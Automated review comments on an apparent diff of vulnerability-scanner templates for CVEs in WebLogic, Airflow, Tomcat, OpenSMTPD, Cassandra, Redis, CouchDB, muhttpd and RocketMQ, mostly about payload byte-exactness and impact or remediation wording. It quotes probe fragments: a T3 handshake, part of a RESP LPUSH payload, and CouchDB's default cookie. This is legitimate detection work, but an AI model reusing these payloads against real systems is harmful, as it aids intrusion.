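Review bot: In the CVE-2018-2893 hunk the rewrite of the first `inputs` entry changes the bytes sent: the one-line `"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"` became a multi-line double-quoted scalar, and in YAML a line break inside such a scalar folds to a single space unless it is followed by an empty line. The other separators get their newline from the blank `+` lines, but there is no blank line between `"t3 12.2.1` and `AS:255`, so the handshake now starts with `t3 12.2.1 AS:255` on one line. Keep the original escaped single-line form. Separately, as rendered, `tcp:`, `inputs:` and `matchers:` appear only as removed lines with no `+` counterpart, and the hex inputs are reordered; please confirm the applied file still has those keys and the same input sequence, and that `max-request: 2` still matches the number of inputs.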
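Review bot: In the CVE-2020-11981 hunk the RESP payload and the `concat(end+ '\r\n')` expression were split into multi-line double-quoted scalars; this only stays byte-equivalent because every break is followed by an empty line (which YAML folds to `\n`), and the `$936` length prefix must still match the body exactly. Prefer keeping the escaped one-line `"*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{...` so the framing is explicit rather than dependent on folding rules. Also, as rendered, `variables:`, `tcp:` and `inputs:` appear only as removed lines with no replacement; confirm they survive in the applied file.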
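Review bot: In the CVE-2020-1938 hunk the new `impact:` covers only file disclosure, while the description also states that processing any file as a JSP, combined with a file upload path, makes remote code execution possible; add that to the impact. The unchanged `remediation:` is a bare URL; suggest text drawn from the description, e.g. `remediation: Upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later, or disable the AJP connector / restrict it to trusted hosts if it is not required.`, and move the Red Hat link into `reference:`.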
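Review bot: In the CVE-2020-7247 hunk the new `impact:` says code runs "with the privileges of the OpenSMTPD process", but the description states commands execute as root; say so, e.g. `Successful exploitation allows an unauthenticated remote attacker to execute arbitrary commands as root via a crafted SMTP session, leading to full compromise of the host.`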
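Review bot: In the CVE-2021-44521 hunk the new `impact:` omits the precondition the description spells out: the attacker must already be permitted to create user defined functions and the cluster must run the documented-unsafe `enable_user_defined_functions`/`enable_scripted_user_defined_functions`/`enable_user_defined_functions_threads: false` combination. Without that, the impact reads as unauthenticated RCE; prefix it with "An attacker with permission to create UDFs on a cluster using the configuration above can ...".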
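Review bot: In the CVE-2022-0543 hunk the new `impact:` ("unauthorized access, data theft, and compromise") is vaguer than the description, which says the Debian/Ubuntu packages left the Lua `package` interface enabled so arbitrary libraries can be loaded; state the actual outcome, i.e. arbitrary code execution in the context of the Redis process on affected Debian/Ubuntu packages. The unchanged `remediation: Update to the most recent versions currently available.` should name the patched package versions from the referenced advisory rather than "most recent".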
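Review bot: In the CVE-2022-24706 hunk the new `impact:` claims arbitrary command execution while the description only states that an attacker gains admin privileges on an improperly secured default installation; the two should agree. Either keep the impact at admin access, or extend the description to explain how the default Erlang cookie (`monster`, mentioned in the remediation) leads to command execution so the impact is supported by the rest of the block.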
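Review bot: In the CVE-2022-31793 hunk the unchanged `remediation: Update the application to version 1.10` is ambiguous next to a description that says "muhttpd 1.1.5 and before": a reader cannot tell whether `1.10` means 1.10 or a mistyped 1.1.x. Verify the fixed version against the referenced advisory and write it unambiguously, e.g. `remediation: Upgrade muhttpd to a version later than 1.1.5 (see the referenced advisory for the fixed release).`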
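Review bot: In the CVE-2023-33246 hunk the unchanged `remediation: Update the RocketMQ application to version 5.1.1` covers only the 5.x branch, while the description says 4.x users should upgrade to 4.9.6 or above; include both, e.g. `remediation: Upgrade to RocketMQ 5.1.1 or later (5.x) or 4.9.6 or later (4.x), and do not expose NameServer, Broker or Controller to untrusted networks.`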